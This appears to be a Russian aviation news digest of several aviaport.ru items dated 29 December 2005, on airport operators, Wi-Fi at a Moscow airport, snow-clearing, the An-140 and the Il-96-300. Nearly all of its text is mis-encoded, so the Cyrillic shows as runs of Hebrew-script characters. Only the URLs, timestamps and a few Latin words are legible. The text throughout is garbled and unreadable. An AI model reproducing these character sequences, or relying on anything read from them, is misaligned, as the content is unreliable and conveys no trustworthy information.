׃ֱִֿ׳ֱֵֵֽֿ ־ֱ ֱֲֵ ֱֿׂ׀ֿׂװֱ ֲֵֿ׃װ׳ֿ ׃ ֱַֿׂ־ֵֹ־־ֿ ֿװ׳ֵװ׃װ׳ֵ־־ֿ׃װ״ְ "בֿׂ׀ֿׂװ "טֵׂ׃ֿ־".ץֱ׃װ־ֱֹֻֽ ֻֿ־ֻױׂ׃ֱ ־ֲִֵָֹֽֿֿֿ ׀ֱִֿװ״ ִֻֿױֵֽ־װ ׳ ֻֿ־ֻױׂ׃־ױְ ֹֻֽֿ׃׃ְֹ ִֿ 12 ׁ־׳ֱׁׂ 2006 ֱִַֿ (׳ְֹֻּװֵּ״־ֿ).בֿׂ׀ֿׂװ ־ֱִָֹֿװ׃ׁ ׀ֿ ֱִֵׂ׃ױ: 73038, טֵׂ׃ֿ־-38.ןֱַׂ־ֱֳֹֹֿ־־ֿ-׀ֱׂ׳ֿ׳ֱׁ ֱֶֽֿׂ ֱֿׂ׀ֿׂװֱ "טֵׂ׃ֿ־" - ֻֽֽֿױ־ֱּ״־ֱׁ ׃ֲֿ׃װ׳ֵ־־ֿ׃װ״ (׃ֿ׳ֵֽ׃װ־ֱׁ ׃ֲֿ׃װ׳ֵ־־ֿ׃װ״ װֵֹׂׂװֱֹּֿׂ״־ָ ֲֹֿ־ ֱֲּֿ׃װֹ). - - - - - ןןן "לץכןךל-בֿׂ" ׀ֲֵֹּֿֿׂׂ ױ ֱ׳ֱֹֻֽֿ׀ֱ־ֹׁ "ףֲֹֹׂ״" װֿ׀ֹּ׳ֱֿ׀ֱׂ׳ֿ־ ֻֽֿ׀ֵֻּ׃ ׳ ֵֽײִױ־ֱִֿׂ־ֽֿ ֱֿׂ׀ֿׂװױ ‏ֲֵֹּׁ־׃ֱֻ - http://www.aviaport.ru/news/2005/12/29/99263.html - ןןן "לץכןךל-בֿׂ" (100-׀ֳֵֿׂ־װ־ֱׁ ִֵֿׂ־ׁׁ ֻֽֿ׀ֱ־ֹׁ ןבן "לץכןךל") ׀ֲֵֹּֿֿׂׂ ױ ןבן "ב׳ֱֹֻֽֿ׀ֱ־ֹׁ "ףֲֹֹׂ״" פתכ "גֱֱּ־ִֹ־ֿ" ׳ ֵֽײִױ־ֱִֿׂ־ֽֿ ֱֿׂ׀ֿׂװױ ‏ֲֵֹּׁ־׃ֱֻ - Thu, 29 Dec 2005 16:55:00 +0300 - ןןן "לץכןךל-בֿׂ" (100-׀ֳֵֿׂ־װ־ֱׁ ִֵֿׂ־ׁׁ ֻֽֿ׀ֱ־ֹׁ ןבן "לץכןךל") ׀ֲֵֹּֿֿׂׂ ױ ןבן "ב׳ֱֹֻֽֿ׀ֱ־ֹׁ "ףֲֹֹׂ״" װֿ׀ֹּ׳ֱֿ׀ֱׂ׳ֿ־ ֻֽֿ׀ֵֻּ׃ (פתכ) "גֱֱּ־ִֹ־ֿ" ׳ ֵֽײִױ־ֱִֿׂ־ֽֿ ֱֿׂ׀ֿׂװױ ‏ֲֵֹּׁ־׃ֱֻ, ׃ֱֲֵֿֿװ ׀ֵׂ׃׃-׃ּױײֱֲ לץכןךלֱ. חִֿֿ׳ֿ ֲֵֽֿ ֱ׀ֱׂ׳ֹֻ ׃ֿ׃װֱ׳ֵּׁװ ׀ֵֹֽׂׂ־ֿ 40 װ׃. װֿ־־. ק ֲֹּײֱֵֵ ׳ֵֽׁׂ ןןן "לץכןךל-בֿׂ" ׀ֱּ־ֹׂױֵװ ׀ֿׂ׳ֵ׃װֹ ֵֻֿׂ־׃װׂױְֳֹֻ ֹ ִֵֽֿׂ־ְֱֳֹֹ ׃ֱֱִֻּ חףם פתכ.ק ־ֱ׃װֵֵֿׁ ׳ֵֽׁׂ ןןן "לץכןךל-בֿׂ" ׀ֹֿׂ׳ִֹֿװ ֱ׀ֱׂ׳ֻױ ׳ִֿױ־ָ ׃ױִֿ׳ ֵֵׂ ׃ֲֿ׃װ׳ֵ־־ױְ ׃ֵװ״ פתכ ׳ ֱֿׂ׀ֿׂװֱָ מֹײ־ֵַֿ מֿ׳ֱִַֿֿׂ, נֵֹֽׂ, קֱֱִַַּֿֿׂ, פְֵֽ־ֹ ֹ ‏ֲֵֹּׁ־׃ֱֻ. ק 2005 ִַֿױ ןןן "לץכןךל-בֿׂ" ֿ׃ױֵ׃װ׳ֹּֿ ֱ׀ֱׂ׳ֻױ ׳ ֲֵֵֽֿ ֻּֿֿֿ 100 װ׃. װֿ־־ ֱ׳ֱֵֹֻֿׂ׃ֹ־ֱ.עֱ׳ֹװֵֹ ֱ׳ֱֹװֿ׀ֹּ׳ֱֿ׀ֱׂ׳ֿ־ַֿֿ ֲֹ־ֵ׃ֱ ׀ִֵׂױ׃ֽֿװֵׂ־ֿ ׳ נֱֵַֽֽֿׂׂ ׃װֱׂװֵֵַֹ׃ַֻֿֿ ֱׂ׳ֹװֹׁ חׂױ׀׀ "לץכןךל" ֹ ׀ִֵׂ׀ֱֱֵַּֿװ ֱׂ׃ֵֹׂ־ֵֹ ׂ־ֱֻ ׃ֲװֱ ֱ׳ֱֹװֿ׀ֹּ׳ֱ ֹ ׃ֱִֿ־ֵֹ ֱׂ׳ֹװֿ ׃ֵװֹ ׃ֲֿ׃װ׳ֵ־־ָ װֿ׀ֹּ׳ֱֿ׀ֱׂ׳ֿ־ָ ֻֽֿ׀ֵֻּ׃ֿ׳ ׳ ֱֿׂ׀ֿׂװֱָ עֿ׃׃ֹֹ ֹ ֱ ׂױֲֵײֽֿ. - - - - - נֿׁ׳ֱֹּ׃״ i-mode ׳ֵׂ׃ֹׁ ׃ֱװֱ ֱֿׂ׀ֿׂװֱ "הִִֵֽֿֿֿ׳ֿ" - http://www.aviaport.ru/news/2005/12/29/99262.html - ק י־װֵׂ־ֵװֵ ׀ֿׁ׳ֱֹּ׃״ i-mode ׳ֵׂ׃ֹׁ ׃ֱװֱ ֱֿׂ׀ֿׂװֱ "הִִֵֽֿֿֿ׳ֿ". הּׁ ׀ּֿ״ֿ׳ֱװֵֵּ ֲֹּֽֿ״־ָ װֵֵֶּֿ־ֿ׳ ִֿ׃װױ׀־ֿ ֿ־ֱּ־-װֱֲּֿ ֹ ֱׂ׃׀ֹ׃ֱ־ֵֹ - Thu, 29 Dec 2005 16:52:00 +0300 - ק י־װֵׂ־ֵװֵ ׀ֿׁ׳ֱֹּ׃״ i-mode ׳ֵׂ׃ֹׁ ׃ֱװֱ ֱֿׂ׀ֿׂװֱ "הִִֵֽֿֿֿ׳ֿ", - ִּׁ ׀ּֿ״ֿ׳ֱװֵֵּ ֲֹּֽֿ״־ָ װֵֵֶּֿ־ֿ׳ ִֿ׃װױ׀־ֿ ׃ֱֵֽֿ ֿ׃־ֿ׳־ֵֿ - ֿ־ֱּ־-װֱֲּֿ ֹ ֱׂ׃׀ֹ׃ֱ־ֵֹ.ק ֲֹּײֱֵֵ ׳ֵֽׁׂ ֲױִֵװ ֿװֻׂװ ֵֵ ִֹֿ־ ֱֻ־ֱּ ִֿ׃װֱ׳ֹֻ ֹ־ֱֳֶֹֹֽֿׂ ׃ י־װֵׂ־ֵװ-׃ֱװֱ - ׃ֱװ ִּׁ כנכ. מֱ׀ֽֿ־ֹֽ, װֿ ־ֱ ֱִ־־ ֵֽֽֿ־װ ֿ־ֱֹֽ ׀ֻֿׂװֹׁ Wi-Fi ׁ׳ְּׁװ׃ׁ ׳ֵ׃״ ׳װֿֿׂ װֱײ, ֲֹ־ֵ׃-ֱּ ֹ ֱּ ֱֳֶֹֹּֿ״־ָ ֱֳִֵֵַֹּ ֹ VIP.מֱ ִ־ָׁ ֲױִֵװ ֱֵׂװ״׃ׁ ׳ֿ׀ֿׂ׃ ֲֿ ױ׳ֵֵֹּ־ֹֹ ֿ־ ׀ֻֿׂװֹׁ, ׳ װֽֿ ֹ׃ֵּ ֲֵֿ׃׀ֵֹװ״ ִֿ׃װױ׀ ׀ֿ Wi-Fi ׳ ֱֱָּ ׀ֵֹּׂװֱ ֹ ֿײֱִֹ־ֹׁ ֵֽײִױ־ֱִֿׂ־ָ ֹ ׳־ױװֵׂ־־ָֹ ֵׂ׃ֿ׳, ׳ ־ֿ׳ָ ׀ֵֵֽֿ־ָֹׁ, ֻֿװֵֿׂ ׀ֿׁ׳ׁװ׃ׁ ׀ֿ׃ֵּ ׳־ֿ׃ֱ ֱֶ׃ֱֱִ ֱֿׂ׳ֱֱֻּֿ. - - - - - נֱׂײ׃ֹֻ ֱֿׂ׀ֿׂװ ֱ׃װֹ־ֿ ֱֻׂװ ֹ-ֱ ׃־ֵַֿ׀ֱֱִ - http://www.aviaport.ru/news/2005/12/29/99261.html - םֵײִױ־ֱִֿׂ־ ֱֿׂ׀ֿׂװ נֱַֹׂ עױ־ֵ ֱ׃װֹ־ֿ ֱֻׂװ ׳ ֵװ׳ֵַׂ ׀ֿ׃ֵּ ־ֿ־ַֿֿ ׃־ֵַֿ׀ֱֱִ - Thu, 29 Dec 2005 16:49:00 +0300 - םֵײִױ־ֱִֿׂ־ ֱֿׂ׀ֿׂװ נֱַֹׂ עױ־ֵ ֱ׃װֹ־ֿ ֱֻׂװ ׳ ֵװ׳ֵַׂ ׀ֿ׃ֵּ ־ֿ־ַֿֿ ׃־ֵַֿ׀ֱֱִ. נֵׂ׃׃-׃ֵֵֻׂװֱׂ״ ֱִֹֽ־ֹ׃װֱֳֹֹׂ ֱֿׂ׀ֿׂװֱ ׃ֱֲֹּֿֿ, װֿ ׃ֱֵּֽֿװ ־ֵ ַֽֿױװ ׳ֵּװֱװ״ ֹ ֱֿׂ׀ֿׂװ ׳ ׃ֿ׃װֿׁ־ֹֹ ׀ֹׂ־ֱֹֽװ״ װּֿ״ֻֿ 15 ׃ֱֵּֽֿװֿ׳ ׳ ֱ׃. ן־ֱ ־ֵ ׃ֱֲֹּֿֿ ׳ֵֵֽׂ־ֹ ׀ּֿ־ַֿֿ ׳ֿ׃׃װֱ־ֿ׳ֵּ־ֹׁ ֱֲֿׂװ ֱֿׂ׀ֿׂװֱ. - - - - - עצה ֿװֵֻֿׂװ ׀ֵֽֿׁׂ ײֵֵּ־ִֿֿֿׂײ־ֵֿ ׃ֲֵֿֿ־ֵֹ ֿװ םֿ׃ֻ׳ ִֿ ֱֿׂ׀ֿׂװֱ "ֵֵֵֽׂװ״ֵ׳ֿ" ֻ 2007 ִַֿױ - http://www.aviaport.ru/news/2005/12/29/99260.html - ןבן "עֿ׃׃ֹ׃ֵֹֻ ײֵֵּ־ֵ ִַֹֿֿׂ" ׀ֱּ־ֹׂױֵװ ֿװֻׂװ״ ׀ֵֽֿׁׂ ײֵֵּ־ִֿֿֿׂײ־ֵֿ ׃ֲֵֿֿ־ֵֹ ֿװ םֿ׃ֻ׳ (ףֱ׳ֵּֿ׳׃ֹֻ ׳ֱֻּֿ) ִֿ ֱֿׂ׀ֿׂװֱ "ֵֵֵֽׂװ״ֵ׳ֿ" ֻ 1 ׁ־׳ֱׁׂ 2007 ַ. - Thu, 29 Dec 2005 16:45:00 +0300 - ןבן "עֿ׃׃ֹ׃ֵֹֻ ײֵֵּ־ֵ ִַֹֿֿׂ" (עצה) ׀ֱּ־ֹׂױֵװ ֿװֻׂװ״ ׀ֵֽֿׁׂ ײֵֵּ־ִֿֿֿׂײ־ֵֿ ׃ֲֵֿֿ־ֵֹ ֿװ םֿ׃ֻ׳ (ףֱ׳ֵּֿ׳׃ֹֻ ׳ֱֻּֿ) ִֿ ֱֿׂ׀ֿׂװֱ "ֵֵֵֽׂװ״ֵ׳ֿ" ֻ 1 ׁ־׳ֱׁׂ 2007 ֱִַֿ, ׃ֲֹּֿֿ ֱַּ׳ֱ ֱֱֶֹֹּּ עצה "םֿ׃ֻֿ׳׃ֱֻׁ ײֵֵּ־ֱׁ ֱִַֿֿׂ" (םצה) קֱִֹֹּֽׂ ףװֱֿׂ׃װֵ־ֻֿ ײױׂ־ֱֹּ׃װֱֽ ׳ ֹֽ־ױ׳ױְ ׃ִֵׂױ ׳ םֿ׃ֻ׳ֵ."ם ֱׂ׃׃ֹװ׳ֱֵֽ, װֿ ֻ ־ֱֱּױ 2007 ֱִַֿ ױ׃׀ֵֵֽ ׀ֿ׃װֹֿׂװ״ ײֵֵּ־ִֿֿֿׂײ־ױְ ׳ֵװֻױ ֿװ לֲֿ־ֹ ִֿ ֱֿׂ׀ֿׂװֱ", - ׃ֱֱֻּ ק.ףװֱֿׂ׃װֵ־ֻֿ. ן־ ֿװֵֽװֹּ, װֿ ־ֱֱּֿ ׃װֹֿׂװֵּ״׃װ׳ֱ ֱ׀ֱּ־ֹֿׂ׳ֱ־ֿ ־ֱ ֱ׀ֵּׂ״ 2006 ֱִַֿ.נֿ ֵַֿ ׃ּֿ׳ֱֽ, ֵׂ״ ִֵֹװ ֿ ׃װֹֿׂװֵּ״׃װ׳ֵ 8,2 ֻֽ ׀ױװֵ, ֻֿװֵֿֿׂ ֲױִֵװ ֶֹ־ֱ־׃ֹֿׂ׳ֱװ״׃ׁ ֱ ׃ֵװ ֹ־׳ֵ׃װ׀ֱַֽֽֿׂׂ עצה.חֱּ׳ֱ םצה ֿװֵֽװֹּ װֱֻײֵ, װֿ ׀ֱֻֿ ־ֵׁ׃־ֿ, ִֵַ ֲױִֵװ ֱׂ׃׀ֱֱַּֿװ״׃ׁ ײֵֵּ־ִֿֿֿׂײ־ֱׁ ׃װֱ־ֳֹׁ ׳ "ֵֵֵֽׂװ״ֵ׳ֿ". "ו׃ֹּ ֲױִֵװ ַֿװֿ׳ װֵֹֽׂ־ֱּ ("ֵֵֵֽׂװ״ֵ׳ֿ-3" - יז), װֿ ׀ִֵֿ ׀ִִֵֿֿװ װױֱִ, ֵ׃ֹּ ־ֵװ, װֿ ֽ ַֿװֿ׳ ׀ֿ׃װֹֿׂװ״ ֲֿ־ױְ ׃װֱ־ְֳֹ", - ׃ֱֱֻּ ק.ףװֱֿׂ׃װֵ־ֻֿ. - - - - - ֻ׃׀ּױֱװְֱֳֹ ׃ֱֵּֽֿװֿ׳ ב־-140 ַֽֿױװ ׳ֵֵֽׂ־־ֿ ׀ֹֿׂ׃װֱ־ֿ׳ֹװ״ - http://www.aviaport.ru/news/2005/12/29/99259.html - ֻ׃׀ּױֱװְֱֳֹ ׃ֱֵּֽֿװֿ׳ ב־-140 ַֽֿױװ ׳ֵֵֽׂ־־ֿ ׀ֹֿׂ׃װֱ־ֿ׳ֹװ״ ִֿ ׳ׁ׃־ֵ־ֹׁ ׳׃ֵָ ֲֿ׃װֿׁװֵּ״׃װ׳ ֱֻװֱ׃װֶֿׂ ֱֹֽ־ ׳ בֱֲִֵׂײֱ־ֵ - Thu, 29 Dec 2005 16:43:00 +0300 - ֻ׃׀ּױֱװְֱֳֹ ׃ֱֵּֽֿװֿ׳ ב־-140 ַֽֿױװ ׳ֵֵֽׂ־־ֿ ׀ֹֿׂ׃װֱ־ֿ׳ֹװ״ ִֿ ׳ׁ׃־ֵ־ֹׁ ׳׃ֵָ ֲֿ׃װֿׁװֵּ״׃װ׳ ֱֻװֱ׃װֶֿׂ ֱֹֽ־ ׳ בֱֲִֵׂײֱ־ֵ.פֱֻױְ װֻֿױ ֵׂ־ֹׁ ׳׃ֱֻ׳ְֱװ ֻ׃׀ֵׂװ, ֵֻֽֽֿ־װֹׂױׁ ׳ֵׂ׃ֹֹ ֱֻװֱ׃װֶֿׂ ׃ֱֵּֽֿװֱ ׀ִֿ גֱֻױ.ףֱַּֿ׃־ֿ ִֿ־ֿ ֹ ־ָֹ, ׀ֹֹׂ־ֿ ׀ֱִֵ־ֹׁ ב־-140 ׃װֱֹּ װֵָ־ֵֹ׃ֵֹֻ ־ֵ׀ֱִֹֻּֿ, ֹ װֲֿ ׀ּֿ־ֿ׃װ״ְ ֹ׃ְֹֻּװ״ ׳ֵֿׁׂװ־ֿ׃װ״ ׀ֿ׳װֵֿׂ־ֹׁ װֱִֵַֹֹׂ, ׀ֵּֿװ ִֵ׃ׁװֱֻ ־ֱִָָֹֿׁ׃ׁ ׃ֱֵ׃ ׳ ֻ׃׀ּױֱװֱֳֹֹ ױֱֹֻׂ־׃ָֹֻ ֱ׳ֱֹֻֽֿ׀ֱ־ֹ ֱֹֽ־ װַֿֿ װֹ׀ֱ ַֽֿױװ ׀ֹֿׂ׃װֱ־ֿ׳ֹװ״.נִֵׂ׃װֱ׳ֹװֵֹּ חֿ׃ֱ׳ֱֹ׃ּױײֲ ץֱֹֻׂ־ ֱִ־־ױְ ֹ־ְֱֳֶֹֽֿׂ ־ֵ ׀ִֿװ׳ֵׂײְֱִװ, ֱׁ׳ּׁׁ, װֿ ײִױװ ֻֿֿ־ֱװֵּ״־ָ ׳׳ִֿֿ׳ ֹֻֽֿ׃׃ֹֹ ׳ בֱֲִֵׂײֱ־ֵ.ןִ־ֱֻֿ ֻ׃׀ֵׂװ ַֿ׳ֿׁׂװ - ֱ׀ֵׂװ ׳׃ֵ ײֵ ֽֿײֵװ ֲװ״ ׳׳ִֵֵ־, ׃׃ֱּׁ׃״ ־ֱ ֿ׀װ װֿ ײֵ עֿ׃׃ֹֹ, ִֵַ ֹ-ֱ ׀ֹֻּֽֿֿ ׳ ֱ׃׃ֹ ׀ִֵֵֹׂ־װ׃ַֻֿֿ ׃ֱֵּֽֿװֱ ֲֹּ ׀ֿ׃װֱ׳ֵּ־ ־ֱ ׀ֹֻּֿׂ ׳׃ֵ ֱֹֽ־ ֱִ־־ֿ ִֵֹּֽֿ. - - - - - בֿׂ׀ֿׂװ םֿ׃ֻ׳ ֱֲֿׂװְֱװ "׀ֿ ֱֶֻװֵֹ׃ֻֿ ׀ִֵַֿֿ" - http://www.aviaport.ru/news/2005/12/29/99258.html - י-ֱ ׃ֹּ״־ַֿֿ ׃־ֵַֿ׀ֱֱִ ׳ םֿ׃ֻ׳ֵ ֱֿׂ׀ֿׂװ "ק־ױֻֿ׳ֿ", "הִִֵֽֿֿֿ׳ֿ" ֹ "ֵֵֵֽׂװ״ֵ׳ֿ" ֱֲֿׂװְֱװ "׀ֿ ֱֶֻװֵֹ׃ֻֿ ׀ִֵַֿֿ", ־ֿ ֱִֵׂײֵֻ ׃ ׳ֵּװֱֹֽ ֹ ׀ֲֹׂװֵֹֽ ֵׂ׃ֿ׳ ־ֵװ - Thu, 29 Dec 2005 16:36:00 +0300 - י-ֱ ׃ֹּ״־ַֿֿ ׃־ֵַֿ׀ֱֱִ ׳ םֿ׃ֻ׳ֵ ׃װֹּֿ־ֵ ֱֿׂ׀ֿׂװ "ק־ױֻֿ׳ֿ", "הִִֵֽֿֿֿ׳ֿ" ֹ "ֵֵֵֽׂװ״ֵ׳ֿ" ֱֲֿׂװְֱװ "׀ֿ ֱֶֻװֵֹ׃ֻֿ ׀ִֵַֿֿ", ־ֿ ֱִֵׂײֵֻ ׃ ׳ֵּװֱֹֽ ֹ ׀ֲֹׂװֵֹֽ ֵׂ׃ֿ׳ ־ֵװ. ןֲ װֽֿ ׃ֲֹּֿֿ ׳ ֵװ׳ֵַׂ עיב מֿ׳ֿ׃װֹ ׀ִֵׂ׃װֱ׳ֹװֵּ״ דֵ־װֱּׂ״־ֿ ִֹ׃׀ֵװֵׂ׃ֻֿ ׃ּױײֲ (דהף) םֿ׃ֻ׳."ק׃ֵ ׃װֹּֿ־ֵ ֱֿׂ׀ֿׂװ ֱֲֿׂװְֱװ ׃ֱֵ׃ "׀ֿ ֱֶֻװֵֹ׃ֻֿ ׀ִֵַֿֿ", װֿ ֵ׃װ״, ׀ֹּֿװ ׃ֱֽֿ׃װֿׁװֵּ״־ֿ ׀ֹׂ־ְֱֹֽװ ֵֵׂ־ֵֹ ֿ ׀ֿ׃ֱִֵֻ. ןִ־ֱֻֿ ־ֱָֹֹֻֻ ֱִֵׂײֵֻ ׃ ׳ֵּװֱֹֽ ֹ ׀ֲֹׂװֵֹֽ ֵׂ׃ֿ׳ ׳ ֱֿׂ׀ֿׂװֱָ ־ֵװ", - ׃ֱֱֻּ ׀ִֵׂ׃װֱ׳ֹװֵּ״ דהף.ן־ װֱֻײֵ ֿװֵֽװֹּ, װֿ "־ֹ ִֹֿ־ ֱֿׂ׀ֿׂװ ־ֵ ֲֿׁ׳ֹּ ֿ ֱֻׂװֹֹ ֹ-ֱ ׀ִַֿֿ"."קֿ ׳׃ֵָ ֱֿׂ׀ֿׂװֱָ ׃ֱֵ׃ ׳ִֹֹֽֿ׃װ״ ׃ֿ׃װֱ׳ֵּׁװ ֲֵֵּֿ װ׃ֹׁ ֵֽװֿׂ׳. ק׃ֵ ׳ֵּװ ֹ ׀ֿ׃ֱִֹֻ ֿ׃ױֵ׃װ׳ְּׁװ׃ׁ ׀ֿ ֱׂ׃׀ֹ׃ֱ־ְֹ, ֲֵ ׃ֲֵֿ׳. זֱֻװֿ׳ ֱֻׂװֹׁ ֱֿׂ׀ֿׂװֿ׳ ־ֵ ֲּֿ", - ׃ֲֹּֿֿ ׃ֲֵֿ׃ִֵ־ֹֻ ֱֵַ־װ׃װ׳ֱ.נֿ ֵַֿ ׃ּֿ׳ֱֽ, ׳ֿ ׳׃ֵָ ׃װֹּֿ־ָ ֱֿׂ׀ֿׂװֱָ ׳ ־ֱ׃װֵֵֿׁ ׳ֵֽׁׂ ֱֲֿׂװֱֵװ ׃׀ֳֵװֵָ־ֱֹֻ ִּׁ ֱׂ׃ֹ׃װֹֻ ׃־ֱֵַ. "ק ׃ּױֱֵ ױ׃ֵֹּ־ֹׁ ׃־ֵַֿ׀ֱֱִ, ׳ ֱֿׂ׀ֿׂװֱָ ֲױִֵװ ׳׳ִֵֵ־ֱ ִֿ׀ּֿ־ֹװֵּ״־ֱׁ ׃׀ֳֵװֵָ־ֱֹֻ", - ֱֲִֿ׳ֹּ ׀ִֵׂ׃װֱ׳ֹװֵּ״ דהף. - - - - - ב׳ֱֹ׀ֽֿׂ ־ֱ ֵֹּװֵ - http://www.aviaport.ru/news/2005/12/29/99257.html - תֱװׁ־ױ׳ֵֵ׃ׁ ֿײֱִֹ־ֵֹ ֵֵׂ־ֹ ׳ֱּ׃װֵ ֿ ׃ױִ״ֲֵ ֿׂ׃׃ֹ׃ַֻֿֿ ֱ׳ֱֹ׀ֱֽֿׂ ֹ ׃ֱֻ־ֱִּ ׳ֻֿׂױַ ֱ׀ֵׂװֱ ־ֱ ׀ֵּֿװ יּ-96-300 - ֱַּ׳־ֵ ֹװַֹֿ ֱ׳ֱֳֹֹֿ־־ֿ ֿװֱׂ׃ֹּ ׳ 2005 ַ. - Thu, 29 Dec 2005 16:31:00 +0300 - תֱװׁ־ױ׳ֵֵ׃ׁ ֿײֱִֹ־ֵֹ ֵֵׂ־ֹ ׳ֱּ׃װֵ ֿ ׃ױִ״ֲֵ ֿׂ׃׃ֹ׃ַֻֿֿ ֱ׳ֱֹ׀ֱֽֿׂ ֹ ׃ֱֻ־ֱִּ ׳ֻֿׂױַ ֱ׀ֵׂװֱ ־ֱ ׀ֵּֿװ ׃ֱַֽֿֿ ־ֿ׳ַֿֿ ֿװֵֵ׃װ׳ֵ־־ַֿֿ ֱִּ״־ֱֵַֹֽ׃װֱּׂ״־ַֿֿ ׃ֱֵּֽֿװֱ יּ-96-300 - ֱַּ׳־ֵ ֹװַֹֿ ֱ׳ֱֳֹֹֿ־־ֿ ֿװֱׂ׃ֹּ ׳ 2005 ִַֿױ.נִֵׂ׀ּֿֿײֹװֵּ״־ֿ ־ֱ ׀ֵׂ׳ֽֿ װֱ׀ֵ ׳ ןבכ ֲױִױװ ׳־ֵ׃ֵ־ ַֿ׃ױֱִׂ׃װ׳ֵ־־ֵ ׀ֱֵֻװ ֱֳֹֻ בטכ "ףױָֿ", םבכ "יּ״ְֹ־", ןבן "פױ׀ֵּֿ׳", ֱ׳ֱִֿ "ףֻּֿֿ", כֽֿ׃ּֽֿֿ״׃ַֻֿֿ-־ֱ-בֽױֵׂ ֱ׳ֱֳֹֹֿ־־ַֿֿ ׀ֹֿׂ׳ִֿ׃װ׳ֵ־־ַֿֿ ֲִֵֹֿ־ֵ־ֹׁ, מֿ׳ֿ׃ֲֹֹׂ׃ַֻֿֿ ֱ׳ֱֳֹֹֿ־־ַֿֿ ׀ֹֿׂ׳ִֿ׃װ׳ֵ־־ַֿֿ ֲִֵֹֿ־ֵ־ֹׁ, "ב׳ֱֹֻ׃׀ֿׂװֱ", ֱ װֱֻײֵ זֹ־ֱ־׃ֿ׳ֿ ֹֹּ־ַֿ׳ֿ ֻֽֿ׀ֱ־ֹֹ ֹ ֻֽֿ׀ֱ־ֹֹ "יּ״ְֹ־ זֹ־ֱ־׃ כֿ". מֱ ׳װֽֿֿׂ װֱ׀ֵ ֻ ֻֿׂ׀ֱֳֹֹֿׂ ׀ְִֹֻּֿװ׃ׁ "יֻׂױװ", ֻֿװֽֿֿׂױ ֽ־ֵַֹֿ ׀ֱֿׂװ ִֵֹּׂ׃װ׳ֿ ׳ ֻֿׂ׀ֱֳֹֹֿׂ. ןִ־ֱ ֹ ׃ֱָֽ ׳ֵֿׁׂװ־ָ ֱֻ־ֱִִֹװױׂ ־ֱ װֿ, װֲֿ ׳ֱַּֿ׳ֹװ״ ןבכ, - ֹ׃׀ּֿ־ֹװֵּ״־ ִֵֹֻׂװֿׂ "יֻׂױװֱ" קֱֵֹּׂ גֵ׳ֵָׂ־ֹ. ק 2005 ִַֿױ ׀ֱׂ׳ֹװֵּ״׃װ׳ֿ ׀ֱּ־ֹֿׂ׳ֱּֿ ׳׃ֵׂ״ֵ ֱ־ׁװ״׃ׁ ֲִֵֹֿ־ֵ־ֵֹֽ ֿׂ׃׃ֹ׃ָֹֻ ֱ׳ֱֳֹֹֿ־־ָ ֱֻװֹ׳ֿ׳. ק ֵֶ׳ֱֵּׂ קֱִֹֹּֽׂ נױװֹ־ ֱׂ׃׀ִֹּֿׁׂ׃ׁ ׀ִַֿֿװֿ׳ֹװ״ ׀ֵֻֿׂװ ױֱֱֻ ׀ֿ ֲִֵֹֿ־ֵ־ְֹ ׳׃ֵָ ֱ׳ֱֹ׃װֹֿׂװֵּ״־ָ ֱ׳ִֿֿ׳ ׳ ִֵֹ־ױְ ֻֽֿ׀ֱ־ְֹ. נִֵׂ׀ֱֱַּּֿֿ׃״, װֿ ׀ִֵֵֹׂ־װ ׀ִֿ׀ֵֹװ ִֻֿױֵֽ־װ ֻ 1 ֱֲִֵֻׁׂ. מֿ ׳ ֹװֵַֿ ֿ־ ־ֵ װּֿ״ֻֿ ־ֵ ֲּ ׀ִֿ׀ֹ׃ֱ־, ־ֿ ֹ ִֿ ׃ָֹ ׀ֿׂ ֿ׃װֱֵװ׃ׁ ֱֱִַֻֿ, ־ֱ ֱָֹֻֻ ױ׃ּֿ׳ָֹׁ ֲױִֵװ ׀ֿׂ׳ִֹֿװ״׃ׁ ֻֿ־׃ֱֳִֹֹּֿׁ.כֿ־׃ֱֳִֹֹּֿׁ ֿׂ׃׃ֹ׃ָֹֻ ׳ֵׂװֵּֿװ־ָ ֱ׳ִֿֿ׳ ׳ 2005 ִַֿױ ׃ֿ׃װֱּֿׁ׃״. ק ׃ֿ׃װֱ׳ ִָֹּֿ־ֱַ ־ֱ ֱֲֵ "ןֲֿֿׂ־׀ֱֽֿׂ" ׳ֹּֿ ןבן "םֿ׃ֻֿ׳׃ֹֻ ׳ֵׂװֵּֿװ־ ֱ׳ִֿ", ןבן "ץֱּ־-ץִֹ־׃ֹֻ ֱ׳ֱֳֹֹֿ־־ ֱ׳ִֿ", ןבן "כֱֱ־׃ֹֻ ׳ֵׂװֵּֿװ־ ֱ׳ִֿ", ןבן "עֿ׃װ׳ֵׂװּֿ", ןבן "םֿ׃ֻֿ׳׃ֹֻ ֱֹֽ־ֿ׃װֹֿׂװֵּ״־ ֱ׳ִֿ "ק׀ִֵֵׂ"", ןבן "ףװױ׀ֹ־׃ֵֻֿ ֱֹֽ־ֿ׃װֹֿׂװֵּ״־ֵֿ ׀ֹֿׂ׳ִֿ׃װ׳ֵ־־ֵֿ ׀ִֵׂ׀ֹׁׂװֵֹ". מֿ ׀ֳֵֿׂ׃׃ ֿ׃װֱ׳ֹּ ֲּֿ״ֵ ׳ֿ׀ֿׂ׃ֿ׳, ֵֽ ֿװ׳ֵװֿ׳, ׀ֹׂ־ְֱװ׃ׁ ֻ׃׀ֵׂװ. "נִֵֵָֿׂ ־ֱ ִֿ־ױ ְֱֳֹֻ ׀ֵּֿׂ ֱֻֻ-װֿ ׃ֱֻֻֽֿ־־ֿ. מֵׁ׃־ֿ, ׀ֿ ֱֻֻֽֿױ ׀ֹׂ־ֳֹ׀ױ ֲּ ׳ֱֲׂ־ ֳֵֶֶֹֹֻֿ־װ ֲֵֽֿ־ֱ, ־ֱ׀ֵֹֽׂׂ", - ׀ִֿ׳ִֹֿװ ֹװַֹֿ ֱ־ֱֹּװֹֻ יכ "עֵ־ֵ׃׃ֱ־׃ כֱ׀ֹװֱּ" םֱֹׂ־ֱ בֵֻּ׃ֵֵ־ֻֿ׳ֱ.ןֲִֵֹ־ֵ־ֵֹ ֱ׳ֱֹֻֽֿ׀ֱ־ֹ ֲּֿ ׀ֿׂ׳ֱֵּ־ֿ, ֲֿ װֽֿ ׳ ֻֿ־ֳֵ ֱֲִֵֻׁׂ ־ֱ׀ֽֿ־ֹּ ֹֽ־ֹ׃װׂ װֱׂ־׃׀ֿׂװֱ יַֿׂ״ לֵ׳ֹװֹ־. מֹ ֲִֵֹֿ־ֵ־ֵֹ ׳ֻֿׂױַ "כֱׂ׃ׂ" (AiRUnion), ־ֹ ֱֳֵֶֹֽֿׁׂׂ "נױֻּֿ׳ֿ" ֹ "עֿ׃׃ֹֹ" ׳ ׀ּֿ־ֿ ֵֵֽׂ 